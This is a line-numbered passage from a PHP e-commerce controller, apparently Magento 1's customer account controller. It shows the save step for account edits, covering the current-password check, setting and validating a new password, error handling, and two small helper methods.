  914.             if ($customerErrors !== true) {
  915.                 $errors = array_merge($customerErrors, $errors);
  916.             } else {
  917.                 $customerForm->compactData($customerData);
  918.                 $errors = array();
  919.  
  920.                 // If password change was requested then add it to common validation scheme
  921.                 if ($this->getRequest()->getParam('change_password')) {
  922.                     $currPass   = $this->getRequest()->getPost('current_password');
  923.                     $newPass    = $this->getRequest()->getPost('password');
  924.                     $confPass   = $this->getRequest()->getPost('confirmation');
  925.  
  926.                     $oldPass = $this->_getSession()->getCustomer()->getPasswordHash();
  927.                     if ( $this->_getHelper('core/string')->strpos($oldPass, ':')) {
  928.                         list($_salt, $salt) = explode(':', $oldPass);
  929.                     } else {
  930.                         $salt = false;
  931.                     }
  932.  
  933.                     if ($customer->hashPassword($currPass, $salt) == $oldPass) {
  934.                         if (strlen($newPass)) {
  935.                             /**
  936.                              * Set entered password and its confirmation - they
  937.                              * will be validated later to match each other and be of right length
  938.                              */
  939.                             $customer->setPassword($newPass);
  940.                             $customer->setPasswordConfirmation($confPass);
  941.                         } else {
  942.                             $errors[] = $this->__('New password field cannot be empty.');
  943.                         }
  944.                     } else {
  945.                         $errors[] = $this->__('Invalid current password');
  946.                     }
  947.                 }
  948.  
  949.                 // Validate account and compose list of errors if any
  950.                 $customerErrors = $customer->validate();
  951.                 if (is_array($customerErrors)) {
  952.                     $errors = array_merge($errors, $customerErrors);
  953.                 }
  954.             }
  955.  
  956.             if (!empty($errors)) {
  957.                 $this->_getSession()->setCustomerFormData($this->getRequest()->getPost());
  958.                 foreach ($errors as $message) {
  959.                     $this->_getSession()->addError($message);
  960.                 }
  961.                 $this->_redirect('*/*/edit');
  962.                 return $this;
  963.             }
  964.  
  965.             try {
  966.                 $customer->cleanPasswordsValidationData();
  967.                 $customer->save();
  968.                 $this->_getSession()->setCustomer($customer)
  969.                     ->addSuccess($this->__('The account information has been saved.'));
  970.  
  971.                 $this->_redirect('customer/account');
  972.                 return;
  973.             } catch (Mage_Core_Exception $e) {
  974.                 $this->_getSession()->setCustomerFormData($this->getRequest()->getPost())
  975.                     ->addError($e->getMessage());
  976.             } catch (Exception $e) {
  977.                 $this->_getSession()->setCustomerFormData($this->getRequest()->getPost())
  978.                     ->addException($e, $this->__('Cannot save the customer.'));
  979.             }
  980.         }
  981.  
  982.         $this->_redirect('*/*/edit');
  983.     }
  984.  
  985.     /**
  986.      * Filtering posted data. Converting localized data if needed
  987.      *
  988.      * @param array $data
  989.      * @return array
  990.      */
  991.     protected function _filterPostData($data)
  992.     {
  993.         $data = $this->_filterDates($data, array('dob'));
  994.         return $data;
  995.     }
  996.  
  997.     /**
  998.      * Check whether VAT ID validation is enabled
  999.      *
  1000.      * @param Mage_Core_Model_Store|string|int $store
  1001.      * @return bool
  1002.      */
  1003.     protected function _isVatValidationEnabled($store = null)
  1004.     {
  1005.         return  $this->_getHelper('customer/address')->isVatValidationEnabled($store);
  1006.     }
  1007. }